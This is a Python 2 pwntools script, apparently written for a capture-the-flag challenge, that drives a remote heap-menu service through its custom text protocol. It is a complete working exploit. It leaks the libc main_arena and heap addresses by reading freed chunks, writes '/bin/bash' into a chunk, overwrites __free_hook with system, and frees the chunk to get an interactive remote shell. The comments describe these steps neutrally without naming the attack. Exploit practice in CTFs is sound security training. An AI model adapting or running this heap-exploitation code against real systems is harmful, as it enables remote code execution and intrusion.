# Python 2 / pwntools script (it uses the `print` statement and `raw_input`):
# drives a line-oriented text service over a socket and performs a fixed
# sequence of allocate / free / read / write commands with hard-coded,
# target-specific offsets.
from pwn import *

context(arch='amd64', word_size=64, os='linux', timeout=0.25)


class R(remote):
    """pwntools `remote` subclass that speaks the service's text protocol.

    Every command is sent only after the service's 'NOM-NOM' prompt has
    been consumed, and every numeric argument goes through `encode_number`.
    """

    def encode_number(self, n):
        """Return `n` in the service's number encoding.

        `n` is masked to 64 bits (so negative offsets become their unsigned
        two's-complement form), written in binary without the '0b' prefix,
        with each '0' replaced by 'wa' and each '1' by 'wi', then padded on
        the right with 'X' to 128 characters (64 bits * 2 characters).
        """
        val = bin(n & 0xffffFFFFffffFFFF)[2:].replace('0', 'wa').replace('1', 'wi')
        return val.ljust(128, 'X')

    def cmd(self, cmd):
        """Wait for the 'NOM-NOM' prompt, then send `cmd` padded to 8 bytes with newlines."""
        self.recvuntil('NOM-NOM\n')
        self.send(cmd.ljust(8, "\n"))

    def alloc(self, n):
        """Send the 'whaa!' command followed by the encoded size `n`."""
        self.cmd('whaa!')
        v = self.encode_number(n)
        self.recvuntil('darling...\n')
        self.send(v + "\n")

    def show(self, n):
        """Send the 'mommy?' command with encoded offset `n`.

        Returns the raw line the service prints after 'darling: ', including
        its trailing newline (callers strip it with `[:-1]`).
        """
        self.cmd('mommy?')
        v = self.encode_number(n)
        self.send(v + "\n")
        self.recvuntil('darling: ')
        return self.recvuntil("\n")

    def fill(self, off, data):
        """Send an empty command (8 newlines), then encoded offset `off`, then `data` as-is.

        `data` is sent verbatim; callers append the newline themselves.
        """
        self.cmd('')
        self.recvuntil('doing?\n')
        v = self.encode_number(off)
        self.send(v + "\n")
        self.recvuntil('darling!\n')
        self.send(data)

    def free(self, off):
        """Send the 'NOM-NOM' command followed by encoded offset `off`."""
        self.cmd('NOM-NOM')
        v = self.encode_number(off)
        self.send(v + "\n")


# Endpoint of the (CTF) service this script was written against; the local
# alternative below is kept for reference.
r = R('flatearth.fluxfingers.net', 1743)
#r = R('localhost',1234)

# Consume the banner up to its final line.
r.recvuntil('(_(___)_|\n')

# Five allocations: four of 0x30 bytes with one of 0x200 in between.
r.alloc(0x30)
r.alloc(0x30)
r.alloc(0x30)
r.alloc(0x200)
r.alloc(0x30)

# Offsets below are computed as 0x20 plus a 0x40 stride per preceding 0x30
# allocation (0x30 requested + 0x10, presumably a per-chunk header — not
# verifiable from this script). They are specific to this target.
r.free(0x20 + (0x30 + 0x10) * 3)

# Read 8 bytes back from the offset just freed: strip the trailing newline,
# zero-pad to 8 bytes, decode little-endian, and subtract a constant. The
# 0x58 adjustment and the two offsets further down are tied to the target's
# libc build and will not hold elsewhere.
main_arena = u64(r.show(0x20 + (0x30 + 0x10) * 3)[:-1].ljust(8, "\x00")) - 0x58

r.free(0x20 + 0x30 + 0x10)
r.free(0x20 + (0x30 + 0x10) * 2)

# Second read-back, this time from the most recently freed offset, adjusted
# by a constant to derive `heap`.
free_fastbin_off = 0x20 + (0x30 + 0x10) * 2
heap = u64(r.show(free_fastbin_off)[:-1].ljust(8, "\x00")) - 0x60

# Target-specific libc constants derived from `main_arena`.
free_hook = main_arena + 0x1c88
system = main_arena - 0x37f790

# Write a newline-terminated string into the first allocation.
r.fill(0x20, '/bin/bash\n')

# Debug output and a manual pause before the final writes.
print hex(main_arena), hex(free_hook), hex(heap)
raw_input('e')

# Write p64(system) at the offset that maps `free_hook` relative to
# `heap - 0x10`, then free the first allocation and hand the socket to
# the user.
r.fill(free_hook - heap - 0x10, p64(system) + "\n")
r.free(0x20)
r.interactive()